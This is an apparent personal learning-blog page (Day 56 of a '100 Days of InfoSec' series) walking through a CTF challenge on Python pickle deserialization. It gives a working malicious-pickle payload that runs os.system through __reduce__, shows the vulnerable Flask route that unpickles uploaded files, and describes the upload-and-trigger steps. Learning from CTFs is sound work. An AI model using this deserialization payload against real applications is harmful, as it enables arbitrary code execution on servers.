<html>

<head>
	<meta content="text/html; charset=UTF-8" http-equiv="content-type">
	<title>Day 56</title>
	<style type="text/css">
		@import url('https://themes.googleusercontent.com/fonts/css?kit=-lTUqgJg2dxbe4D7B5DEID164ctO4cAXGRkC_ZwBWlzm74GqoUREvGx3nvtIBwYUN4duVc9C58uwPiY8_59Fz51Zsjtnjtw1i9vMMjzZT74');

		.lst-kix_fi2xbrv6fzbg-6>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-6
		}

		ol.lst-kix_fi2xbrv6fzbg-2.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-2 0
		}

		.lst-kix_2yzjaagjqxah-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-3, decimal) ". "
		}

		.lst-kix_5lp3gqbxm2h8-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-2>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-2, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-6>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-6, decimal) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-0 {
			list-style-type: none
		}

		.lst-kix_5lp3gqbxm2h8-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_5lp3gqbxm2h8-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_fi2xbrv6fzbg-5>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-5, lower-roman) ". "
		}

		.lst-kix_fi2xbrv6fzbg-4>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-4, lower-latin) ". "
		}

		.lst-kix_5lp3gqbxm2h8-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_5lp3gqbxm2h8-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-4>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-4
		}

		.lst-kix_fi2xbrv6fzbg-7>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-7
		}

		.lst-kix_5lp3gqbxm2h8-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-7>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-7, lower-latin) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-1 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-2 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-3 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-4 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-5 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-6 {
			list-style-type: none
		}

		ul.lst-kix_hkg89eyxvtvi-7 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-8>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-8, lower-roman) ". "
		}

		ul.lst-kix_hkg89eyxvtvi-8 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-0.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-0 0
		}

		.lst-kix_kjisakvjzjsi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_fi2xbrv6fzbg-3>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-3
		}

		.lst-kix_kjisakvjzjsi-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_kjisakvjzjsi-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_kjisakvjzjsi-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_kjisakvjzjsi-8>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_i6qpwdhuifir-1>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-4.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-4 0
		}

		.lst-kix_fi2xbrv6fzbg-1>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-1, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-0>li:before {
			content: ""counter(lst-ctn-kix_fi2xbrv6fzbg-0, decimal) ". "
		}

		.lst-kix_hkg89eyxvtvi-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_hkg89eyxvtvi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_5lp3gqbxm2h8-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_hkg89eyxvtvi-3>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-1 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-0 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_hkg89eyxvtvi-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_i6qpwdhuifir-0 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-2 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-1 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-4 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-4>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_i6qpwdhuifir-3 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-6 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-5 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-8 {
			list-style-type: none
		}

		ul.lst-kix_i6qpwdhuifir-7 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_hkg89eyxvtvi-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-5 {
			list-style-type: none
		}

		.lst-kix_i6qpwdhuifir-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_i6qpwdhuifir-6>li:before {
			content: "\0025cf  "
		}

		ul.lst-kix_5lp3gqbxm2h8-4 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-5.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-5 0
		}

		ul.lst-kix_5lp3gqbxm2h8-3 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-2>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-2 {
			list-style-type: none
		}

		.lst-kix_kjisakvjzjsi-1>li:before {
			content: "\0025cb  "
		}

		.lst-kix_i6qpwdhuifir-7>li:before {
			content: "\0025cb  "
		}

		ul.lst-kix_5lp3gqbxm2h8-8 {
			list-style-type: none
		}

		.lst-kix_hkg89eyxvtvi-8>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_5lp3gqbxm2h8-7 {
			list-style-type: none
		}

		ul.lst-kix_5lp3gqbxm2h8-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-8 {
			list-style-type: none
		}

		.lst-kix_fi2xbrv6fzbg-0>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-0
		}

		ul.lst-kix_kjisakvjzjsi-5 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-4 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-7 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-6 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-3 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-8 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-1 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-2 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-6 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-3 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-0 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-4 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-1 {
			list-style-type: none
		}

		ul.lst-kix_2yzjaagjqxah-2 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-8 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-1 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-0 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-3 {
			list-style-type: none
		}

		ul.lst-kix_kjisakvjzjsi-2 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-6 0
		}

		ol.lst-kix_fi2xbrv6fzbg-3.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-3 0
		}

		.lst-kix_fi2xbrv6fzbg-1>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-1
		}

		ol.lst-kix_fi2xbrv6fzbg-7.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-7 0
		}

		ol.lst-kix_fi2xbrv6fzbg-1.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-1 0
		}

		.lst-kix_2yzjaagjqxah-7>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-2>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-2
		}

		.lst-kix_fi2xbrv6fzbg-5>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-5
		}

		.lst-kix_2yzjaagjqxah-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-5>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-8>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-8
		}

		ol.lst-kix_fi2xbrv6fzbg-8.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-8 0
		}

		.lst-kix_2yzjaagjqxah-3>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-0>li:before {
			content: "\0025cf  "
		}

		.lst-kix_2yzjaagjqxah-1>li:before {
			content: "\0025cb  "
		}

		ol {
			margin: 0;
			padding: 0
		}

		table td,
		table th {
			padding: 0
		}

		.c2 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 11pt
		}

		.c3 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 14pt;
			font-family: "Montserrat";
			font-style: normal
		}

		.c0 {
			background-color: #1e1e1e;
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.3571428571428572;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c20 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: right
		}

		.c5 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c21 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: center
		}

		.c14 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c18 {
			font-size: 10.5pt;
			font-family: "Courier New";
			color: #ce9178;
			font-weight: 400
		}

		.c11 {
			color: #6a9955;
			font-weight: 400;
			font-size: 10.5pt;
			font-family: "Courier New"
		}

		.c1 {
			font-size: 10.5pt;
			font-family: "Courier New";
			color: #d4d4d4;
			font-weight: 400
		}

		.c16 {
			font-size: 10.5pt;
			font-family: "Courier New";
			color: #569cd6;
			font-weight: 400
		}

		.c10 {
			color: #434343;
			font-weight: 400;
			font-size: 14pt;
			font-family: "Montserrat"
		}

		.c7 {
			font-size: 10.5pt;
			font-family: "Courier New";
			color: #c586c0;
			font-weight: 400
		}

		.c12 {
			font-size: 10.5pt;
			font-family: "Courier New";
			color: #4ec9b0;
			font-weight: 400
		}

		.c13 {
			color: #000000;
			font-weight: 300;
			font-size: 14pt;
			font-family: "Roboto Mono"
		}

		.c4 {
			font-size: 10.5pt;
			font-family: "Courier New";
			color: #dcdcaa;
			font-weight: 400
		}

		.c8 {
			font-size: 18pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 900
		}

		.c9 {
			font-size: 10.5pt;
			font-family: "Courier New";
			color: #9cdcfe;
			font-weight: 400
		}

		.c22 {
			background-color: #ffffff;
			max-width: 600pt;
			padding: 72pt 72pt 72pt 72pt;
			margin: auto;
		}

		.c19 {
			font-family: "Montserrat";
			color: #000000;
			font-weight: 800
		}

		.c6 {
			text-decoration: none;
			vertical-align: baseline;
			font-style: normal
		}

		.c17 {
			height: 14pt
		}

		.c15 {
			height: 11pt
		}

		.title {
			padding-top: 0pt;
			color: #000000;
			font-size: 26pt;
			padding-bottom: 3pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.subtitle {
			padding-top: 0pt;
			color: #666666;
			font-size: 15pt;
			padding-bottom: 16pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		li {
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		p {
			margin: 0;
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		h1 {
			padding-top: 20pt;
			color: #000000;
			font-size: 20pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h2 {
			padding-top: 18pt;
			color: #000000;
			font-size: 16pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h3 {
			padding-top: 16pt;
			color: #434343;
			font-size: 14pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h4 {
			padding-top: 14pt;
			color: #666666;
			font-size: 12pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h5 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h6 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			font-style: italic;
			orphans: 2;
			widows: 2;
			text-align: left
		}
	</style>
</head>

<body class="c22">
	<h3 class="c20" id="h.3zvpwyx0el37"><span class="c8">56<br></span><span
			class="c8">/<br>100<br>Days<br>Of<br>InfoSec</span>
		<hr>
	</h3>
	<h3 class="c14" id="h.uhn6dzi5itr4"><span class="c19">CTFd &mdash; Pickle! </span></h3>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span class="c3">Learnt about object serialization today. Serialization is a way to convert objects
			into binary to store them and then deserialize to render the data back as an object.</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span class="c3">This CTF problem was a serialization problem in python3, hence, the name &nbsp;-
			pickle is the python serialization library.</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span class="c3">The idea is that if you know you know an application is going to pickle and unpickle
			some data and the unpickling happens over a GET request then the user has unrestricted access and can give
			&lsquo;pickled&rsquo; commands to the web application to unpickle and run</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span class="c3">For example:</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c0"><span class="c7">import</span><span class="c1 c6">&nbsp;pickle</span></p>
	<p class="c0"><span class="c7">import</span><span class="c1 c6">&nbsp;os</span></p>
	<p class="c0 c15"><span class="c1 c6"></span></p>
	<p class="c0"><span class="c16">class</span><span class="c1">&nbsp;</span><span class="c12">Evil</span><span
			class="c1">(</span><span class="c12">object</span><span class="c1 c6">):</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp;</span><span class="c16">def</span><span class="c1">&nbsp;</span><span
			class="c4">__reduce__</span><span class="c1">(</span><span class="c9">self</span><span
			class="c1 c6">):</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c7">return</span><span
			class="c1">&nbsp;(os.system, (</span><span class="c18">&#39;cp /flag.txt notes/flag.txt&#39;</span><span
			class="c1 c6">, ))</span></p>
	<p class="c0 c15"><span class="c1 c6"></span></p>
	<p class="c0"><span class="c1 c6">pickle_data = pickle.dumps(Evil())</span></p>
	<p class="c0 c15"><span class="c1 c6"></span></p>
	<p class="c0"><span class="c7">with</span><span class="c1">&nbsp;</span><span class="c4">open</span><span
			class="c1">(</span><span class="c18">&#39;payload&#39;</span><span class="c1">, </span><span
			class="c18">&#39;wb&#39;</span><span class="c1">) </span><span class="c7">as</span><span
			class="c1 c6">&nbsp;f:</span></p>
	<p class="c0"><span class="c1 c6">&nbsp; &nbsp;f.write(pickle_data)</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span class="c3">The above command would upon unpickling, execute </span></p>
	<p class="c5"><span class="c13 c6">cp &nbsp;/flag.txt &nbsp;notes/flag.txt</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span class="c3">That was the case with this CTF challenge. Source excerpt:</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c0"><span class="c4">@app.route</span><span class="c1">(</span><span
			class="c18">&#39;/notes/&lt;file_name&gt;&#39;</span><span class="c1 c6">)</span></p>
	<p class="c0"><span class="c16">def</span><span class="c1">&nbsp;</span><span class="c4">notes</span><span
			class="c1">(</span><span class="c9">file_name</span><span class="c1 c6">):</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp;</span><span class="c7">if</span><span
			class="c1">&nbsp;request.args.get(</span><span class="c18">&#39;view&#39;</span><span class="c1">,
		</span><span class="c9">default</span><span class="c1">=</span><span class="c16">False</span><span
			class="c1 c6">):</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span
			class="c6 c11">##################################################################</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c11 c6"># let me go ahead and unpickle
			whatever file is being requested...</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span
			class="c11 c6">##################################################################</span></p>
	<p class="c0"><span class="c1 c6">&nbsp; &nbsp; &nbsp; &nbsp;note=unpickle_file(file_name)</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c7">return</span><span
			class="c1">&nbsp;render_template(</span><span class="c18">&#39;view.html&#39;</span><span class="c1">,
		</span><span class="c9">note</span><span class="c1 c6">=note)</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp;</span><span class="c7">else</span><span class="c1 c6">:</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span
			class="c11 c6">##################################################################</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c11 c6"># let me go ahead and send
			whatever file is being requested...</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span
			class="c11 c6">##################################################################</span></p>
	<p class="c0"><span class="c1">&nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c7">return</span><span
			class="c1 c6">&nbsp;send_from_directory(NOTE_FOLDER, file_name)</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c13 c6"></span></p>
	<p class="c2"><span class="c13 c6"></span></p>
	<p class="c5"><span class="c3">So I uploaded the pickled payload with a .png extension cause that&rsquo;s what the
			web application wanted and edited the GET URL so my payload would be unpickled</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span class="c6 c13">/notes/solve.png?view=true</span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 750.75px; height: 214.50px;"><img
				alt="" src="images/image1day56.png"
				style="width: 1262.72px; height: 710.28px; margin-left: 0.00px; margin-top: -101.18px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 756.60px; height: 178.50px;"><img
				alt="" src="images/image3day56.png"
				style="width: 1265.73px; height: 711.97px; margin-left: 0.00px; margin-top: -97.36px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c5"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 782.83px; height: 176.50px;"><img
				alt="" src="images/image2day56.png"
				style="width: 1288.88px; height: 728.84px; margin-left: 0.00px; margin-top: -101.75px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c5"><span class="c13 c6">Flag:
			flag{you_had_to_have_known_this_flag_would_have_pickle_rick_in_it_031e39fafea0}</span></p>
	<p class="c2"><span class="c13 c6"></span></p>
	<p class="c2"><span class="c13 c6"></span></p>
	<p class="c2"><span class="c13 c6"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<p class="c2"><span class="c3"></span></p>
	<h3 class="c14 c17" id="h.dardaoz37s2v"><span class="c10 c6"></span></h3>
	<hr>
	<p class="c21"><span class="c3">
		<a href='/100days/day55.html'>Previous</a>
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/'>Home</a>
		&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
		<a href='/100days/day57.html'>Next</a>
	</span>
	</p>
</body>

</html>